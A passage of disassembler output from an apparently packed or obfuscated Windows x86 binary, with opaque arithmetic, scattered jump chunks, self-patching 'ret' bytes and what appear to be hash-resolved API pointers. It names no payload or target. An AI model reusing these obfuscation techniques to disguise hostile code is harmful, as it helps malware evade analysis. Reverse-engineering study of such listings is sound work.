; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DFB

loc_45A183:				; CODE XREF: sub_457DFB+6j
		pop	ebp
		jmp	loc_44C237
; END OF FUNCTION CHUNK	FOR sub_457DFB
; ---------------------------------------------------------------------------

loc_45A189:				; CODE XREF: hvvrg7ie:004406CAj
		call	sub_4427B2
; START	OF FUNCTION CHUNK FOR sub_44D8CE

loc_45A18E:				; CODE XREF: sub_44D8CE-19F7j
		jmp	nullsub_399
; END OF FUNCTION CHUNK	FOR sub_44D8CE
; ---------------------------------------------------------------------------
		add	edi, 174BCAEDh
		jmp	sub_439990
; ---------------------------------------------------------------------------

loc_45A19E:				; CODE XREF: hvvrg7ie:loc_44EB5Bj
					; hvvrg7ie:0044EB64j
		sub	eax, 4CE1BB03h
		add	eax, 7C957F8Dh
		add	eax, ebp
		add	eax, 0F0CD03F8h
		mov	eax, [eax]
		jmp	loc_457ECF
; ---------------------------------------------------------------------------

locret_45A1B9:				; CODE XREF: hvvrg7ie:loc_446709j
		retn
; ---------------------------------------------------------------------------

loc_45A1BA:				; CODE XREF: hvvrg7ie:0045525Fj
		jmp	locret_450D27
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_45A1BF:				; CODE XREF: sub_45038B-F92Aj
		jmp	loc_443434
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------

loc_45A1C4:				; CODE XREF: hvvrg7ie:loc_43A9E3j
		xor	eax, 75F9D769h

; =============== S U B	R O U T	I N E =======================================



sub_45A1CA	proc near		; CODE XREF: sub_45541B:loc_44FAD3j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C32E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00449420 SIZE 00000005 BYTES

		push	ebx
		pushf
		push	0F3D7F5ADh
		pop	ebx
		add	ebx, 62E0320Eh
		sub	ebx, 565BDFF1h
		add	ebx, 0FFE8FC37h
		jmp	loc_43C32E
sub_45A1CA	endp

; ---------------------------------------------------------------------------

loc_45A1E9:				; DATA XREF: sub_455273:loc_43E92Eo
		mov	esp, ebp
		xchg	edx, [esp]
		mov	ebp, edx
		pop	edx
		mov	eax, ds:dword_439CBC
		or	eax, eax
		jmp	loc_43D17E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439C28

loc_45A1FE:				; CODE XREF: sub_439C28+18j
		xchg	esi, [esp-10h+arg_C]
		mov	ebx, esi
		pop	esi
		xchg	ecx, [esp+0]
		mov	eax, 0F8394D14h
		jmp	loc_45A4FF
; END OF FUNCTION CHUNK	FOR sub_439C28
; ---------------------------------------------------------------------------

loc_45A211:				; CODE XREF: hvvrg7ie:004520B0j
		add	ebp, eax
		jmp	loc_447722
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_45A218:				; CODE XREF: sub_455087-79E6j
		shl	ecx, 0Ch
		adc	ebp, 0F43744C4h
		add	edx, 192AFF2h
		shr	ecx, 1Ch

loc_45A22A:				; CODE XREF: sub_455087:loc_43AEB0j
		push	0CEAFF65Fh
		jmp	loc_43FB89
; END OF FUNCTION CHUNK	FOR sub_455087

; =============== S U B	R O U T	I N E =======================================



sub_45A234	proc near		; CODE XREF: sub_43A0EC:loc_4482E5p
					; hvvrg7ie:00458FF8j

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004399E9 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00439E33 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A615 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A693 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043B4C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BF86 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043CDFF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DEF5 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004406AE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00440A83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442D79 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004436E9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00443826 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443C43 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00444055 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00444E1E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004456C2 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004490E8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449273 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044935D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00449855 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044C826 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044EDD9 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 004501A3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045113A SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00451850 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452761 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458475 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00459A03 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A096 SIZE 00000006 BYTES

		xchg	edx, [esp+0]
		pop	edx
		test	byte ptr [ebp-8], 2
		jz	loc_4467A3
		push	ebp
		mov	eax, [ebp-20h]
		call	sub_441C58

loc_45A24B:				; CODE XREF: sub_4541D4-C07Aj
		jmp	loc_44935D
sub_45A234	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D16B

loc_45A250:				; CODE XREF: sub_43D16B+50D4j
		jz	loc_43F308
		jmp	loc_44A581
; END OF FUNCTION CHUNK	FOR sub_43D16B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B9C9

loc_45A25B:				; CODE XREF: sub_44036B+9EA7j
					; sub_45B07D-B73Aj ...
		mov	al, 1
		jmp	loc_4559D6
; END OF FUNCTION CHUNK	FOR sub_43B9C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4446E9

loc_45A262:				; CODE XREF: sub_4446E9+12j
					; sub_45B07D-B746j
		inc	dword ptr [ebp-4]
		jmp	loc_43F4A5
; END OF FUNCTION CHUNK	FOR sub_4446E9

; =============== S U B	R O U T	I N E =======================================



sub_45A26A	proc near		; CODE XREF: sub_43E7F3+7088p

arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 004464D6 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00447925 SIZE 00000005 BYTES

		call	sub_456763
		push	ecx
		mov	ecx, [esp+4+arg_8]
		jmp	loc_447925
sub_45A26A	endp

; ---------------------------------------------------------------------------

loc_45A279:				; CODE XREF: hvvrg7ie:0043A79Fj
		mov	esi, [edi]

loc_45A27B:				; CODE XREF: hvvrg7ie:loc_43A791j
		xor	eax, 827491D6h
		add	eax, ebp
		add	eax, 0EF95A020h
		push	eax
		mov	eax, [ebp+8]
		push	eax
		jmp	loc_454DCB
; ---------------------------------------------------------------------------

loc_45A293:				; CODE XREF: hvvrg7ie:0044F329j
		jz	loc_45720F
		mov	edx, ebp
		js	loc_4464FC
		test	eax, edx
		jmp	loc_44662B
; ---------------------------------------------------------------------------
		sbb	ecx, eax
		jmp	loc_44261A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_45A2AF:				; CODE XREF: sub_446D8D:loc_45090Ej
		jz	loc_455744
		jmp	loc_4427AD
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
		mov	ds:off_41D034, eax
		lea	eax, sub_43F98C
		mov	byte ptr [eax],	0C3h
		jmp	loc_45624D

; =============== S U B	R O U T	I N E =======================================



sub_45A2CE	proc near		; CODE XREF: sub_41A690+284p
					; sub_41A690+2B2p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439D93 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BA93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D55B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044B801 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044D322 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00450177 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453328 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00457F60 SIZE 0000000F BYTES

		push	eax
		push	3A5915F1h
		pop	eax
		and	eax, 0E0B6C9B0h
		rol	eax, 6
		jmp	loc_450177
sub_45A2CE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B5

loc_45A2E3:				; CODE XREF: sub_44A1B5:loc_45097Aj
		jz	loc_43A072
		popf
		jmp	loc_43A06D
; END OF FUNCTION CHUNK	FOR sub_44A1B5
; ---------------------------------------------------------------------------

loc_45A2EF:				; CODE XREF: hvvrg7ie:0045A533j
		jb	loc_454EA8
		jb	sub_451697
		jmp	loc_44DC35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4540F9

loc_45A300:				; CODE XREF: sub_4540F9+5j
		jmp	ds:off_41D174
; END OF FUNCTION CHUNK	FOR sub_4540F9
; ---------------------------------------------------------------------------

loc_45A306:				; CODE XREF: hvvrg7ie:004432FFj
		jmp	nullsub_494
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E854

loc_45A30B:				; CODE XREF: sub_43E854+5j
		jmp	nullsub_404
; END OF FUNCTION CHUNK	FOR sub_43E854

; =============== S U B	R O U T	I N E =======================================



sub_45A310	proc near		; CODE XREF: hvvrg7ie:00443F48j
					; sub_44A654:loc_44E719j ...
		xchg	esi, [esp+0]
		mov	edx, esi
		call	sub_457774

loc_45A31A:				; CODE XREF: sub_44ADA5+C4D7j
		jmp	loc_455448
sub_45A310	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_45A31F:				; CODE XREF: sub_45038B-DA85j
		jmp	loc_455114
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_45A324:				; CODE XREF: sub_4413A5+5A2j
		push	offset loc_439E52
		jmp	nullsub_406
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------
		not	eax
		jmp	loc_44C50D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_45A335:				; CODE XREF: sub_43E128:loc_44FBC0j
		push	eax
		pushf
		push	0BD2C86A3h
		xchg	ebp, [esp+0Ch+var_C]
		mov	eax, ebp
		pop	ebp
		rol	eax, 9
		jmp	loc_43ED18
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------

loc_45A34A:				; CODE XREF: hvvrg7ie:004483AEj
		add	edx, 0DFE30A3Fh
		xor	ecx, 5719AE45h
		xchg	esi, edx
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_45A358:				; CODE XREF: sub_43AB99+D802j
		xor	eax, 0DFB2FDDBh
		push	offset sub_4550DA
		jmp	nullsub_407
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
		push	0FE403EC1h
		pop	eax
		rol	eax, 1Ah
		or	eax, 39DE0E0Ah
		xor	eax, 34B49D29h
		call	sub_450C5A
		mov	ds:off_41D0A8, eax
		lea	eax, loc_4501E7
		jmp	loc_452799
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455E0D

loc_45A393:				; CODE XREF: sub_455E0D+Dj
		xchg	ecx, [esp+0]
		mov	ebx, ecx
		pop	ecx
		xchg	esi, [esp+0]
		jmp	loc_452F6D
; END OF FUNCTION CHUNK	FOR sub_455E0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_45A3A1:				; CODE XREF: sub_454099-CC0Aj
		jnz	loc_43D3D7
; END OF FUNCTION CHUNK	FOR sub_454099
; START	OF FUNCTION CHUNK FOR sub_440B7A

loc_45A3A7:				; CODE XREF: sub_440B7A+3j
		jmp	loc_44B7EA
; END OF FUNCTION CHUNK	FOR sub_440B7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E34F

loc_45A3AC:				; CODE XREF: sub_44E34F-E7ACj
		jmp	loc_44CA3C
; END OF FUNCTION CHUNK	FOR sub_44E34F
; ---------------------------------------------------------------------------
		db 0Fh,	8Ah, 0AFh
		dd 23FFFE27h, 0E9D703D0h, 0FFFE3011h
; ---------------------------------------------------------------------------

loc_45A3C0:				; CODE XREF: hvvrg7ie:loc_440BCDj
		mov	ds:dword_41D068, eax
		lea	eax, nullsub_446
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_446
; ---------------------------------------------------------------------------
		call	nullsub_442
		jmp	ds:dword_41D06C
; ---------------------------------------------------------------------------

loc_45A3DF:				; CODE XREF: hvvrg7ie:00450AA3j
		jmp	locret_445F24
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_442. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		sub	al, 24h
		mov	edx, ebp
		jmp	loc_44B38B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4550CA

loc_45A3EE:				; CODE XREF: sub_4550CA+Bj
		ror	esi, 12h
		jmp	loc_452EEB
; END OF FUNCTION CHUNK	FOR sub_4550CA
; ---------------------------------------------------------------------------

loc_45A3F6:				; CODE XREF: hvvrg7ie:004395D7j
		xchg	edx, ebp
; START	OF FUNCTION CHUNK FOR sub_4435FA

loc_45A3F8:				; CODE XREF: sub_4435FA:loc_459D16j
		mov	ecx, 54D3517Fh
		sbb	edi, eax
		xchg	edx, edi
; END OF FUNCTION CHUNK	FOR sub_4435FA
; START	OF FUNCTION CHUNK FOR sub_43D30A

loc_45A401:				; CODE XREF: sub_43D30A:loc_4395C1j
		xor	ecx, 62BFB3EAh
		sub	eax, ecx
		pop	ecx

loc_45A40A:				; CODE XREF: hvvrg7ie:004583B6j
		call	sub_4595B2

loc_45A40F:				; CODE XREF: sub_440881+14AF6j
		jmp	loc_4499AF
; END OF FUNCTION CHUNK	FOR sub_43D30A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45535C

loc_45A414:				; CODE XREF: sub_45535C+Dj
		jmp	loc_44206E
; END OF FUNCTION CHUNK	FOR sub_45535C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E463

loc_45A419:				; CODE XREF: sub_44E463+7j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_44E463
; ---------------------------------------------------------------------------

loc_45A41E:				; CODE XREF: hvvrg7ie:0043E55Dj
		jmp	sub_43A0C9
; ---------------------------------------------------------------------------

loc_45A423:				; CODE XREF: hvvrg7ie:0044F52Dj
		push	12A9868Ch
		pop	edx
		rol	edx, 5
		xor	edx, ds:4000F9h
		jmp	loc_45B61D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_45A437:				; CODE XREF: sub_456F9F-14320j
		jz	loc_452C8C
		jmp	loc_43EB31
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_45A442:				; CODE XREF: sub_43E128+3A21j
		pop	edx
		mov	eax, [esp-8+arg_4]
		push	edx
		call	sub_44F7CF
		mov	eax, 5A4FBBBh
		call	sub_450C5A
		mov	ds:dword_41D0BC, eax
		lea	eax, nullsub_25
		jmp	loc_459F61
; END OF FUNCTION CHUNK	FOR sub_43E128
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_252. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_194. PRESS KEYPAD	"+" TO EXPAND]
aRyzhmne	db 'RYZhMNE',0          ; DATA XREF: sub_45038B-E3FBo
; ---------------------------------------------------------------------------
		jmp	loc_44BAD6
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D0F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514E0

loc_45A47C:				; CODE XREF: sub_4514E0-3E74j
		jmp	loc_45B622
; END OF FUNCTION CHUNK	FOR sub_4514E0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_429. PRESS KEYPAD	"+" TO EXPAND]
		dd offset sub_448181
; ---------------------------------------------------------------------------
		jmp	loc_448423
; ---------------------------------------------------------------------------

loc_45A48B:				; CODE XREF: hvvrg7ie:0044C986j
		rol	eax, 0Ch
		shl	ebp, 1Ch
		mov	ecx, 2F353CF5h
		shr	ecx, 12h
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_45A499:				; CODE XREF: sub_43E128:loc_44C974j
		rol	eax, 1Bh
		sub	eax, 0E367537h
		add	eax, 93FC8D03h

loc_45A4A8:				; CODE XREF: hvvrg7ie:loc_455E7Dj
		mov	eax, [eax]
		jmp	loc_44D44B
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A564

loc_45A4AF:				; CODE XREF: sub_43A564:loc_44B729j
		mov	byte ptr [eax],	0C3h
		jmp	loc_459EAA
; END OF FUNCTION CHUNK	FOR sub_43A564
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_45A4B7:				; CODE XREF: sub_4414F6-3B9j
		mov	eax, [esp-8+arg_4]
		push	edx
		nop
		jmp	loc_452DED
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AA1C

loc_45A4C1:				; CODE XREF: sub_44AA1C+1902j
		pop	ecx
		xor	eax, eax
		jmp	sub_44E4A6
; END OF FUNCTION CHUNK	FOR sub_44AA1C

; =============== S U B	R O U T	I N E =======================================



sub_45A4C9	proc near		; CODE XREF: sub_43EE33-4D5Aj

; FUNCTION CHUNK AT 0043F071 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004405BA SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004525DA SIZE 00000005 BYTES

		add	esp, 0FFFFFFD0h
		mov	eax, 12h
		push	edx
		push	0FA7B7156h

loc_45A4D7:				; CODE XREF: sub_44BFF5:loc_43BDAAj
		pop	edx
		jmp	loc_4405BA
sub_45A4C9	endp

; ---------------------------------------------------------------------------
		pop	edi
		mov	eax, [esp]
		push	edx
		call	sub_454E54
		push	4079732Eh
		pop	eax
		jmp	loc_43BF0F
; ---------------------------------------------------------------------------
		popf
		xor	ebx, 0BD6E46D9h
		jmp	sub_4569F5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_307. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439C28

loc_45A4FF:				; CODE XREF: sub_439C28+205E4j
		jmp	loc_44AEFD
; END OF FUNCTION CHUNK	FOR sub_439C28
; ---------------------------------------------------------------------------

loc_45A504:				; CODE XREF: hvvrg7ie:004478D6j
		jmp	loc_44A5DF
; ---------------------------------------------------------------------------
		not	esi
		jmp	loc_445932
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_45A510:				; CODE XREF: sub_45889B:loc_44AEC5j
		xor	eax, 99E3A1DAh
		mov	edx, [esp+0]
		push	eax
		push	offset sub_44D976
		jmp	loc_44AD61
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_45A524:				; CODE XREF: sub_43F227+F85Fj
		pushf
		cmp	edi, edx
		jmp	loc_4539CF
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_45A52C:				; CODE XREF: hvvrg7ie:00451B8Bj
		push	eax
		cmp	ebx, 1BFC9F87h
		jmp	loc_45A2EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2C4

loc_45A538:				; CODE XREF: sub_43B2C4:loc_45577Bj
		pop	esi
		xor	esi, 661343C0h
		add	esi, 6326C5CAh
		xchg	esi, [esp+0]
		jmp	sub_44CEC8
; END OF FUNCTION CHUNK	FOR sub_43B2C4
; ---------------------------------------------------------------------------
		mov	edx, [ebp+0]
		jmp	loc_45269E
; ---------------------------------------------------------------------------

loc_45A555:				; CODE XREF: hvvrg7ie:loc_43BD14j
		xchg	edx, [esp]
		jmp	loc_44959C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F907

loc_45A55D:				; CODE XREF: sub_43F907+6CD9j
		xchg	ebp, [esp-0Ch+arg_8]
		mov	ecx, ebp
		pop	ebp
		pop	ebp
		jmp	loc_43C94E
; END OF FUNCTION CHUNK	FOR sub_43F907
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_45A569:				; CODE XREF: sub_43F227:loc_441F68j
		sbb	eax, 0EBF074EFh
		push	edi
		jmp	loc_457F8B
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_45A575:				; CODE XREF: hvvrg7ie:loc_4396A4j
		jz	loc_43D412

loc_45A57B:				; CODE XREF: hvvrg7ie:loc_454143j
		jmp	loc_4510EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_45A580:				; CODE XREF: sub_440643:loc_448C86j
		sub	eax, 38C7BBC2h
		rol	eax, 13h
		and	eax, 6BFEACFAh
		add	eax, 0F6856D9Eh
		jmp	loc_440471
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_45A59A:				; CODE XREF: sub_44CEC8:loc_43C138j
		add	eax, 40D3CB3Ch
		add	eax, ebp
		push	ebx
		push	0F0AEE427h

loc_45A5A8:				; CODE XREF: hvvrg7ie:loc_445BD5j
		pop	ebx
		rol	ebx, 18h
		or	ebx, 0F93AFC31h
		jmp	loc_44DACB
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED23

loc_45A5B7:				; CODE XREF: sub_44ED23+7j
		mov	[ebp-4], eax
		push	5BBF7C12h
		pop	eax
		or	eax, 447E122Ah
		xor	eax, 83ECA83Dh
		test	eax, 80000h
		jmp	loc_44C6EC
; END OF FUNCTION CHUNK	FOR sub_44ED23
; ---------------------------------------------------------------------------

loc_45A5D7:				; CODE XREF: hvvrg7ie:004564E5j
		xor	edi, 0D5B4E98Ch
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_45A5DD:				; CODE XREF: sub_44388C:loc_4564C2j
		add	edx, 0E31550E4h
		add	edx, ebp
		add	edx, 83D1468Dh
		mov	edx, [edx]
		mov	[edx], eax
		jmp	loc_43983D
; END OF FUNCTION CHUNK	FOR sub_44388C

; =============== S U B	R O U T	I N E =======================================



sub_45A5F4	proc near		; CODE XREF: sub_44388C+8B53p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004437E5 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044D4C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E1F0 SIZE 0000000B BYTES

		push	edx
		mov	edx, ebp
		jmp	loc_4437E5
sub_45A5F4	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_265. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447162

loc_45A5FD:				; CODE XREF: sub_447162+A0F9j
		push	offset loc_44546B
		jmp	loc_45B192
; END OF FUNCTION CHUNK	FOR sub_447162
; ---------------------------------------------------------------------------

loc_45A607:				; CODE XREF: hvvrg7ie:00451A37j
		jnp	locret_440AC4
		rol	ebp, 1Ch
		and	ebx, edi
		and	edx, 276EA607h
		jns	loc_4393F2
; START	OF FUNCTION CHUNK FOR sub_441DDD

loc_45A61E:				; CODE XREF: sub_441DDD+FC3Fj
		add	ebx, 98A9D1Dh
		jmp	loc_45ADFF
; END OF FUNCTION CHUNK	FOR sub_441DDD
; ---------------------------------------------------------------------------

loc_45A629:				; CODE XREF: hvvrg7ie:loc_441E3Fj
		mov	[esi], eax
		pop	esi
		call	sub_44017B

loc_45A631:				; CODE XREF: hvvrg7ie:loc_44C963j
					; DATA XREF: sub_43B624+10FA2o
		mov	[esi], eax
		pop	esi
		lea	eax, sub_43B594
		mov	byte ptr [eax],	0C3h
		jmp	sub_43B594
; ---------------------------------------------------------------------------
		push	edi
		push	72E09285h
		pop	edi
		or	edi, 0DA7D46AAh
		jmp	loc_455F7A
; ---------------------------------------------------------------------------

loc_45A654:				; CODE XREF: hvvrg7ie:004393D4j
		push	2B228ED6h
		and	ecx, 3BA7395Bh
		sbb	eax, esi
		jmp	loc_453A2E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B334

loc_45A666:				; CODE XREF: sub_45B334-1BC83j
		xor	edx, 0F2D8314h
		sub	edx, 0A44C75E0h
		and	edx, ds:4000F1h
		add	edx, 3D4D34h
		xchg	edx, [esp+4+var_4]
		jmp	sub_4425F0
; END OF FUNCTION CHUNK	FOR sub_45B334
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_45A686:				; CODE XREF: sub_44E3B3:loc_446116j
					; sub_44E3B3+992Bj
		push	0C5A6517Bh
		pop	eax
		add	eax, ds:4000F9h
		xor	eax, 95E738FBh
		add	eax, 0D4D27268h
		xor	eax, 10C7C879h
		jmp	loc_4559D1
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------

loc_45A6A9:				; CODE XREF: hvvrg7ie:004510DCj
		and	ecx, edi
		mov	[eax], edi
		jmp	loc_439701
; ---------------------------------------------------------------------------

loc_45A6B2:				; CODE XREF: hvvrg7ie:00447D80j
		jle	loc_451433
		jbe	loc_454B9D
		jns	loc_44274C
		jmp	loc_452FE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_45A6C9:				; CODE XREF: sub_442FD1-F68j
		mov	eax, esi
		cdq
		ror	ebp, 10h
		jnb	loc_44B58A
		jmp	loc_45B28A
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
		shl	edi, 14h
		mov	ecx, eax
		jmp	sub_43D980

; =============== S U B	R O U T	I N E =======================================



sub_45A6E4	proc near		; CODE XREF: sub_446D3C+Ep
					; sub_455DA8:loc_44D297j

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00454C26 SIZE 0000000A BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	al, [edi]
		pop	edi
		xchg	eax, [esp+0]
		mov	ebx, eax
		pop	eax
		pop	ecx
		jmp	loc_454C26
sub_45A6E4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45A6F7:				; CODE XREF: hvvrg7ie:004412B8j
		jz	loc_447CE1
		jmp	loc_447248
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443048

loc_45A702:				; CODE XREF: sub_443048+1j
		mov	eax, [esp-4+arg_0]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+0]
		call	sub_455751
		mov	eax, 0F38AA262h
		call	sub_450C5A
		mov	ds:off_41D150, eax

loc_45A720:				; CODE XREF: hvvrg7ie:loc_43E8DAj
		jmp	loc_45A8F3
; END OF FUNCTION CHUNK	FOR sub_443048
; ---------------------------------------------------------------------------
		not	edi
		jmp	loc_43C3CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_45A72C:				; CODE XREF: sub_44398A:loc_44C246j
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_448B89
		jmp	loc_439A78
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_45A740:				; CODE XREF: sub_4554E8+Cj
		mov	ecx, eax
		xchg	ecx, [esp+0]
		push	3FA967A7h
		pop	eax
		xor	eax, 0CD9C455Ah
		or	eax, 0CEF33454h
		add	eax, 0BA650626h
		jmp	loc_43E21D
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
		adc	esi, edx
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_45A764:				; CODE XREF: sub_451E6D:loc_442A71j
		jmp	sub_44FC12
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529EA

loc_45A769:				; CODE XREF: sub_4529EA+Dj
		cmp	eax, [ebp-14h]
		jb	loc_45A784

loc_45A772:				; CODE XREF: sub_45B9BB-A3C5j
		mov	eax, [ebp-10h]
		mov	eax, [eax+64h]
		add	eax, [ebp-14h]
		cmp	eax, [ebp-0Ch]
		ja	loc_459ED9

loc_45A784:				; CODE XREF: sub_4529EA+7D82j
		cmp	dword ptr [ebp-8], 0A22F8A70h
		jmp	loc_45819E
; END OF FUNCTION CHUNK	FOR sub_4529EA
; ---------------------------------------------------------------------------

loc_45A790:				; CODE XREF: hvvrg7ie:loc_44E07Bj
					; hvvrg7ie:0044E092j
		add	edx, 59F952BEh
		xor	edx, 0B3108EE5h
